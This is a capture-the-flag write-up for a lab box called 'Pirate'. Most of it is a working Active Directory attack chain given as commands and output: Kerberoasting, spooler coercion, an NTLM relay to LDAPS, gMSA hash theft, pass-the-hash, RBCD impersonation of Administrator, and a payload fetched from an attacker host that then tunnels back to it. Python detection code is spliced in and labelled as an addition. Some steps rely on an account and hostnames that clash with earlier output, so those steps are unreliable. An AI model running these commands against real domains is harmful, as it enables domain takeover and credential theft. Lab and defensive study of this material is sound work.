Pirate

Level: Hard

As is common in real-life pentests, you start the Pirate box with credentials for the following account:

  • User: pentest
  • Password: p3nt3st2025!&

nmap -sC -sV $IP_TARGET -Pn
Starting Nmap 7.95 ( https://nmap.org ) at 2026-02-28 23:27 CET
Nmap scan report for 10.129.8.145
Host is up (0.052s latency).
Not shown: 985 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-03-01 05:27:31Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: pirate.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2026-03-01T05:28:54+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=DC01.pirate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.pirate.htb
| Not valid before: 2025-06-09T14:05:15
|_Not valid after:  2026-06-09T14:05:15
443/tcp  open  https?
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: pirate.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2026-03-01T05:28:53+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=DC01.pirate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.pirate.htb
| Not valid before: 2025-06-09T14:05:15
|_Not valid after:  2026-06-09T14:05:15
2179/tcp open  vmrdp?
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: pirate.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2026-03-01T05:28:54+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=DC01.pirate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.pirate.htb
| Not valid before: 2025-06-09T14:05:15
|_Not valid after:  2026-06-09T14:05:15
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: pirate.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2026-03-01T05:28:53+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=DC01.pirate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.pirate.htb
| Not valid before: 2025-06-09T14:05:15
|_Not valid after:  2026-06-09T14:05:15
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2026-03-01T05:28:14
|_  start_date: N/A
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
|_clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m59s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 108.90 seconds

SMB enumeration

The GPOs are stored in SYSVOL and we have read access to it over SMB, so it can give us important information. I use RECURSE ON to download the files recursively and PROMPT OFF to avoid a confirmation prompt for each file.

Bloodhound enumeration

BloodHound was used to map the Active Directory environment and identify attack paths reachable from the compromised user, with the objective of finding privilege escalation paths.

bloodhound-python -u pentest -p 'p3nt3st2025!&' -d pirate.htb -ns $IP_TARGET -dc DC01.pirate.htb -c all

Kerberoasting

The goal of enumerating SPNs is to identify service accounts in Active Directory. Accounts with SPNs are potential targets for Kerberoasting, as we can request a Kerberos TGS for the service and obtain a ticket encrypted with the service account’s password hash. This ticket can then be cracked offline using tools such as Hashcat in order to recover the plaintext credentials.

sudo rdate -n $IP_TARGET
GetUserSPNs.py -request -dc-ip $IP_TARGET pirate.htb/pentest -outputfile hashes.kerberoast

If a user has an SPN, request the TGS:

crackmapexec smb 10.129.9.111 -u pentest -p 'p3nt3st2025!&' --shares

GetUserSPNs.py pirate.htb/pentest -dc-ip 10.129.9.111 -request -rc4

hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule

No vulnerable service accounts were identified, suggesting Kerberoasting is not a viable attack path in this environment.
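As an added detection-side example (not from the original writeup), the following Python scans constructed Windows Security event 4769 records for the footprint a GetUserSPNs.py -request -rc4 run leaves: one account obtaining RC4-encrypted (TicketEncryptionType 0x17) service tickets for several SPN-bearing user accounts within a short window. The field names follow the 4769 event; the records themselves are constructed samples.

```python
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"          # TicketEncryptionType of RC4 tickets, the type Kerberoast tooling asks for
WINDOW = timedelta(minutes=5)
MIN_DISTINCT_SPNS = 3      # a real client rarely needs tickets for many different services at once

# Constructed sample of Security event 4769 (Kerberos service ticket requested) records.
# Real events carry more fields; these are the ones the detection uses.
SAMPLE_EVENTS = [
    {"time": "2026-03-01 05:30:01", "TargetUserName": "pentest@PIRATE.HTB",
     "ServiceName": "svc_sql", "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"time": "2026-03-01 05:30:01", "TargetUserName": "pentest@PIRATE.HTB",
     "ServiceName": "svc_backup", "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"time": "2026-03-01 05:30:02", "TargetUserName": "pentest@PIRATE.HTB",
     "ServiceName": "svc_web", "TicketEncryptionType": "0x17", "Status": "0x0"},
    # Normal activity: an AES ticket for a computer account, and a TGS for krbtgt (not roastable).
    {"time": "2026-03-01 05:31:10", "TargetUserName": "a.white@PIRATE.HTB",
     "ServiceName": "DC01$", "TicketEncryptionType": "0x12", "Status": "0x0"},
    {"time": "2026-03-01 05:31:11", "TargetUserName": "pentest@PIRATE.HTB",
     "ServiceName": "krbtgt", "TicketEncryptionType": "0x17", "Status": "0x0"},
]

def is_roastable_target(service):
    """Only user accounts with SPNs can be roasted; computer accounts and krbtgt are excluded."""
    return not service.endswith("$") and service.lower() != "krbtgt"

def kerberoast_suspects(events, window=WINDOW, min_spns=MIN_DISTINCT_SPNS):
    """Return {requester: sorted distinct services} for requesters that obtained successful
    RC4 service tickets for at least `min_spns` distinct user accounts within `window`."""
    per_user = defaultdict(list)
    for ev in events:
        if ev["TicketEncryptionType"] != RC4_HMAC or ev["Status"] != "0x0":
            continue
        if not is_roastable_target(ev["ServiceName"]):
            continue
        per_user[ev["TargetUserName"]].append(
            (datetime.strptime(ev["time"], "%Y-%m-%d %H:%M:%S"), ev["ServiceName"]))
    suspects = {}
    for user, reqs in per_user.items():
        reqs.sort()                                   # sliding window over time-ordered requests
        for i, (t0, _) in enumerate(reqs):
            spns = {svc for t, svc in reqs[i:] if t - t0 <= window}
            if len(spns) >= min_spns:
                suspects[user] = sorted(spns)
                break
    return suspects

if __name__ == "__main__":
    for user, spns in kerberoast_suspects(SAMPLE_EVENTS).items():
        print(f"possible Kerberoasting by {user}: RC4 tickets for {', '.join(spns)}")
```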

MAQ section

The MachineAccountQuota was found to be 10, meaning a low-privileged user can create up to 10 machine accounts in the domain. This is critical because machine accounts can be abused for attacks such as Resource-Based Constrained Delegation (RBCD).

netexec ldap $IP_TARGET -u pentest -p 'p3nt3st2025!&' -M maq
[*] Initializing LDAP protocol database
LDAP        10.129.9.111    389    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01)(domain:pirate.htb) (signing:None) (channel binding:Never)
LDAP        10.129.9.111    389    DC01             [+] pirate.htb\pentest:p3nt3st2025!&
MAQ         10.129.9.111    389    DC01             [*] Getting the MachineAccountQuota
MAQ         10.129.9.111    389    DC01             MachineAccountQuota: 10

Create a new machine account:

impacket-addcomputer pirate.htb/pentest:'p3nt3st2025!&' \
-computer-name PWNBOX$ \
-computer-pass Passw0rd! \
-dc-ip $IP_TARGET

Certipy failure

Certipy failed to connect to the ADCS endpoint, indicating that the Certificate Authority is not reachable from the current network segment or is not exposed to the compromised host.

certipy find -u pentest -p 'p3nt3st2025!&' -dc-ip $IP_TARGET -vulnerable
[*] Retrieving CA configuration for 'pirate-DC01-CA' via RRP
[-] Failed to connect to remote registry: [Errno Connection error (192.168.100.1:445)] [Errno 111] Connection refused
[-] Use -debug to print a stacktrace
[!] Failed to get CA configuration for 'pirate-DC01-CA' via RRP: 'NoneType' object has no attribute 'request'

RBCD section

We leveraged MachineAccountQuota to create a new computer account in the domain. This is a key prerequisite for Resource-Based Constrained Delegation (RBCD), as it allows us to introduce a controlled computer object into Active Directory.

We then abused Active Directory permissions to modify the target machine’s delegation settings by writing to the msDS-AllowedToActOnBehalfOfOtherIdentity attribute. This effectively allowed our machine account to impersonate domain users, including privileged accounts, against the target system.

  • DC01 –> 10.129.9.111
  • WEB01 –> 192.168.100.2
  • CA –> 192.168.100.1

Spooler / coercion scan

During enumeration, the Print Spooler service was identified as enabled on the Domain Controller. This service can be abused to force the system to authenticate to an attacker-controlled host. This behavior is commonly used in NTLM relay attacks to capture authentication attempts from high-value machines.

netexec smb $IP_TARGET -u pentest -p 'p3nt3st2025!&' -M spooler
SMB         10.129.9.111    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:pirate.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.9.111    445    DC01             [+] pirate.htb\pentest:p3nt3st2025!&
SPOOLER     10.129.9.111    445    DC01             Spooler service enabled

This authentication coercion provides an opportunity to capture NTLM authentication attempts from the Domain Controller, which can then be relayed to Active Directory services in order to modify sensitive permissions.

coercer scan -t $IP_TARGET -u 'pentest' -p 'p3nt3st2025!&' -d pirate.htb -v

The coerced authentication was intended to be relayed to LDAP services in order to perform privileged Active Directory modifications. We configured DC01$ to trust PWNBOX$ for delegation.

python3 /usr/share/doc/python3-impacket/examples/rbcd.py -action write -delegate-to DC01$ -delegate-from PWNBOX$ pirate.htb/pentest:'p3nt3st2025!&'

Authentication Coercion

During further enumeration, authentication coercion was performed against the Domain Controller using the Print Spooler service.

This technique forces the target system to authenticate to an attacker-controlled host, exposing NTLM authentication attempts.

python3 coercer.py  auth -u 'pentest' -p 'p3nt3st2025!&' -d pirate.htb -dc-ip $IP_TARGET

___    __
/'___`\ /\ \
_____   _ __    __          /\_\ /\ \\ \ \/'\
/\ '__`\/\`'__\/'__`\ _______\/_/// /__\ \ , <
\ \ \L\ \ \ \//\  __//\______\  // /_\ \\ \ \\`\
\ \ ,__/\ \_\\ \____\/______/ /\______/ \ \_\ \_\
\ \ \/  \/_/ \/____/         \/_____/   \/_/\/_/
\ \_\                                      v3.1
\/_/
@unsigned_sh0rt
@Tw1sm

[22:30:51] INFO     Retrieved 7 results total.
[22:30:51] INFO     Testing started at 2026-03-01 22:30:51
[22:30:51] INFO     Using 10 threads
[22:30:52] INFO     VALID CREDENTIALS: pirate.htb\EXCH01$:exch01
[22:30:52] INFO     VALID CREDENTIALS: pirate.htb\MS01$:ms01

Kerberos Authentication using Machine Account (MS01$)

The recovered MS01$ machine account credentials were used to request a Kerberos Ticket Granting Ticket (TGT).

python3 getTGT.py pirate.htb/MS01$:ms01 -dc-ip $IP_TARGET
export KRB5CCNAME=MS01$.ccache
klist

gMSA Enumeration via LDAP

Using the previously obtained Kerberos ticket (MS01$), we authenticated to LDAP with Kerberos instead of NTLM.

nxc ldap dc01.pirate.htb -k --use-kcache --gmsa
LDAP        dc01.pirate.htb 389    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:PIRATE.HTB) (signing:None) (channel binding:Never)
LDAP        dc01.pirate.htb 389    DC01             [+] PIRATE.HTB\MS01$ from ccache
LDAP        dc01.pirate.htb 389    DC01             [*] Getting GMSA Passwords
LDAP        dc01.pirate.htb 389    DC01             Account: gMSA_ADCS_prod$      NTLM: 304106f739822ea2ad8ebe23f802d078     PrincipalsAllowedToReadPassword: Domain Secure Servers
LDAP        dc01.pirate.htb 389    DC01             Account: gMSA_ADFS_prod$      NTLM: 8126756fb2e69697bfcb04816e685839     PrincipalsAllowedToReadPassword: Domain Secure Servers

This allowed us to query Group Managed Service Accounts (gMSA) stored in Active Directory.

gMSA accounts are service accounts whose passwords are managed automatically by the domain controller and can only be retrieved by authorized principals.

In this case, the MS01$ machine account had sufficient privileges (via membership in privileged groups) to retrieve gMSA password material.

The following accounts were identified:

  • gMSA_ADCS_prod$ –> NTLM: 304106f739822ea2ad8ebe23f802d078
  • gMSA_ADFS_prod$ –> NTLM: 8126756fb2e69697bfcb04816e685839

These NTLM hashes can be used to impersonate service accounts and escalate privileges within the domain.

Credential Reuse and Lateral Movement

Using the NTLM hashes obtained from the gMSA accounts, we attempted to authenticate as both service accounts.

evil-winrm -i $IP_TARGET -u gMSA_ADCS_prod$ -H 304106f739822ea2ad8ebe23f802d078

evil-winrm -i $IP_TARGET -u gMSA_ADFS_prod$ -H 8126756fb2e69697bfcb04816e685839

Lateral Movement & Internal Access (WEB01 / ADCS / ADFS)

After obtaining service account access, we established a foothold on internal systems using WinRM.

Invoke-WebRequest -Uri "http://10.10.14.82:8000/agent.exe" -OutFile "C:\Users\gmsa_adfs_prod$\Documents\agent.exe"

This payload was transferred to maintain access and facilitate further interaction with the internal network segment.

Network Pivoting (Ligolo-ng)

To access internal subnets (including 192.168.100.0/24), a tunnel was established using Ligolo-ng.

sudo ip tuntap add dev ligolo mode tun user $(whoami)
sudo ip tuntap add user $(whoami) mode tun ligolo
sudo ip link set ligolo up
sudo ip route add 192.168.100.0/24 dev ligolo
sudo ip addr add 192.168.100.2/24 dev ligolo

On the target machine, the agent was executed to establish the tunnel:

./agent.exe -connect 10.10.14.82:11601 -ignore-cert

This provided routed access to previously unreachable internal hosts such as WEB01 and CA infrastructure.

Machine Account Creation (RBCD Preparation)

To continue privilege escalation via Resource-Based Constrained Delegation (RBCD), a new machine account was created in Active Directory.

python3 addcomputer.py pirate.htb/pentest:'p3nt3st2025!&' \
-dc-ip $IP_TARGET \
-computer-name ATTACKBOX$ \
-computer-pass Pass123!

Impacket v0.13.0.dev0+20240916.171021.65b774de - Copyright Fortra, LLC and its affiliated companies

[*] Successfully added machine account ATTACKBOX$ with password Pass123!.

This resulted in successful creation of the machine account ATTACKBOX$.

Resource-Based Constrained Delegation (RBCD Abuse)

The newly created machine account was then used to modify delegation settings on a target machine via RBCD.

rbcd.py -delegate-to 'QFHDSGYV$' -delegate-from 'ATTACKBOX$' -dc-ip $IP_TARGET -action write 'pirate.htb/pentest:p3nt3st2025!&'

This granted the controlled computer account the ability to act on behalf of other users against the target system through S4U2Proxy delegation.

LDAP Relay for Automatic Delegation Rights Modification

An NTLM relay attack was performed against the Domain Controller’s LDAP service to automatically modify Active Directory permissions.

sudo python3 krbrelayx.py -t ldaps://$IP_TARGET --delegate-access

During the relay, authentication from GMSA_ADFS_PROD$ was captured and successfully relayed to LDAP.

This resulted in:

  • Automatic creation of a new machine account (QFHDSGYV$)
  • Modification of delegation permissions on the target object
  • Granting constrained delegation rights via msDS-AllowedToActOnBehalfOfOtherIdentity

NTLM Coercion & LDAP Relay (Delegation Abuse)

An authentication coercion attack was performed against the Domain Controller in order to force NTLM authentication from a privileged machine account.

sudo $(which coercer) coerce -l 10.10.14.82 -t 192.168.100.2 -d pirate.htb -u 'gMSA_ADFS_prod$' --hashes :8126756fb2e69697bfcb04816e685839 --always-continue

This triggered the Print Spooler service, forcing the Domain Controller to authenticate back to the attacker-controlled host.

LDAP NTLM Relay to AD

The captured authentication was relayed to LDAP using ntlmrelayx, allowing modification of Active Directory objects.

sudo python3 ntlmrelayx.py -t ldaps://$IP_TARGET --delegate-access --remove-mic -smb2support
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Protocol Client DCSYNC loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client SMTP loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server on port 445
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server on port 9389
[*] Setting up RAW Server on port 6666
[*] Multirelay disabled

[*] Servers started, waiting for connections
[*] SMBD-Thread-5 (process_request_thread): Received connection from 192.168.100.2, attacking target ldaps://10.129.11.195
[*] Authenticating against ldaps://10.129.11.195 as PIRATE.HTB/GMSA_ADFS_PROD$ SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] Attempting to create computer in: CN=Computers,DC=pirate,DC=htb
[*] Adding new computer with username: QFHDSGYV$ and password: u{pyq<r:,qo@Xld result: OK
[*] Delegation rights modified succesfully!
[*] QFHDSGYV$ can now impersonate users on GMSA_ADFS_PROD$ via S4U2Proxy

During the relay attack:

  • Authentication from GMSA_ADFS_PROD$ was successfully relayed
  • A new machine account was automatically created: QFHDSGYV$
  • Delegation rights were modified via msDS-AllowedToActOnBehalfOfOtherIdentity

This enabled Resource-Based Constrained Delegation (RBCD) against the target environment.
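The two attributes written in this box, msDS-AllowedToActOnBehalfOfOtherIdentity (RBCD) and msDS-GroupMSAMembership (the gMSA PrincipalsAllowedToReadPassword list shown earlier), are both stored as binary security descriptors whose DACL names the trusted SIDs. The following Python is an added audit example, not code from the writeup or from Impacket: it parses such a self-relative descriptor and reports trustees outside an approved set, so that a computer account that suddenly trusts PWNBOX$ or QFHDSGYV$ stands out. The domain SID, RIDs and descriptor blobs are constructed in-code rather than read from LDAP.

```python
import struct
ACCESS_ALLOWED_ACE_TYPE = 0x00
SE_DACL_PRESENT = 0x0004

def parse_sid(buf, off):
    """Decode a binary SID at `off`; return (string form, byte length)."""
    rev, count = buf[off], buf[off + 1]
    authority = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)
    return "S-%d-%d" % (rev, authority) + "".join("-%d" % s for s in subs), 8 + 4 * count

def encode_sid(text):
    """Inverse of parse_sid; only used to build the constructed sample blobs below."""
    rev, authority, *subs = (int(p) for p in text.split("-")[1:])
    return bytes([rev, len(subs)]) + authority.to_bytes(6, "big") + struct.pack("<%dI" % len(subs), *subs)

def allowed_trustees(sd):
    """SIDs granted by ACCESS_ALLOWED ACEs in the DACL of a self-relative security descriptor."""
    rev, _, control, _owner, _group, _sacl, dacl_off = struct.unpack_from("<BBHIIII", sd, 0)
    if rev != 1 or not control & SE_DACL_PRESENT or dacl_off == 0:
        return []  # no DACL: the attribute grants nobody anything
    _, _, _acl_size, ace_count, _ = struct.unpack_from("<BBHHH", sd, dacl_off)
    pos, trustees = dacl_off + 8, []
    for _ in range(ace_count):
        ace_type, _flags, ace_size = struct.unpack_from("<BBH", sd, pos)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            trustees.append(parse_sid(sd, pos + 8)[0])  # skip 4-byte ACE header + 4-byte mask
        pos += ace_size
    return trustees

def build_sd(sids, mask=0x000F01FF):
    """Constructed self-relative SD: one ACCESS_ALLOWED ACE per SID (default mask = DS full control)."""
    aces = b"".join(struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, 8 + len(encode_sid(s)), mask)
                    + encode_sid(s) for s in sids)
    acl = struct.pack("<BBHHH", 4, 0, 8 + len(aces), len(sids), 0) + aces
    return struct.pack("<BBHIIII", 1, 0, 0x8000 | SE_DACL_PRESENT, 0, 0, 0, 20) + acl

def audit(entries, approved):
    """entries: {object: sd blob}. Return {object: [trustee SIDs not in approved]} for objects with any."""
    unexpected = {name: [s for s in allowed_trustees(blob) if s not in approved] for name, blob in entries.items()}
    return {name: sids for name, sids in unexpected.items() if sids}

# Constructed domain SID and RIDs; the entries mirror the two RBCD writes and the gMSA ACL in this writeup.
DOMAIN = "S-1-5-21-1111111111-2222222222-3333333333"
PWNBOX, QFHDSGYV, SECURE_SERVERS = DOMAIN + "-1105", DOMAIN + "-1106", DOMAIN + "-1200"
SAMPLE = {
    "DC01$ msDS-AllowedToActOnBehalfOfOtherIdentity": build_sd([PWNBOX]),
    "GMSA_ADFS_PROD$ msDS-AllowedToActOnBehalfOfOtherIdentity": build_sd([QFHDSGYV]),
    "gMSA_ADFS_prod$ msDS-GroupMSAMembership": build_sd([SECURE_SERVERS]),
}

if __name__ == "__main__":
    for obj, sids in audit(SAMPLE, approved={SECURE_SERVERS}).items():
        print("unexpected trustee on %s: %s" % (obj, ", ".join(sids)))
```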

RBCD-Based Impersonation (Kerberos S4U)

Using the delegated machine account, a Kerberos service ticket was requested to impersonate a privileged user.

getST.py -spn 'cifs/WEB01.pirate.local' -impersonate 'Administrator' -dc-ip $IP_TARGET 'pirate.htb/TJDJIXEF$:I^(WJ8f5jy)@q_,' 

This granted authenticated access as Administrator on the WEB01 system via Kerberos delegation.

Lateral Movement (WEB01 Access)

impacket.psexec -k -no-pass WEB01.pirate.htb

Privilege Escalation

A password reset was performed on a privileged account:

bloodyAD -d pirate.htb -u 'a.white' -p 'E2nvAOKSz5Xz2MJu' -H $IP_TARGET -i $IP_TARGET set password a.white_adm 'password123$'

Service Principal Name (SPN) Abuse

A Service Principal Name was added to enable Kerberos-based impersonation of the WEB01 service.

python3 addspn.py -u 'pirate.htb\a.white_adm' -p 'password123$' -t 'WEB01$' -s 'HTTP/WEB01.pirate.htb' -r $IP_TARGET

A service ticket impersonating Administrator was then requested for the new SPN, using -altservice to substitute the CIFS service on DC01.

impacket.getST -spn 'HTTP/WEB01.pirate.htb' -impersonate 'Administrator' 'pirate.htb/a.white_adm:password123$' -dc-ip $IP_TARGET  -altservice 'CIFS/DC01.pirate.htb'

impacket.psexec -k -no-pass DC01.pirate.htb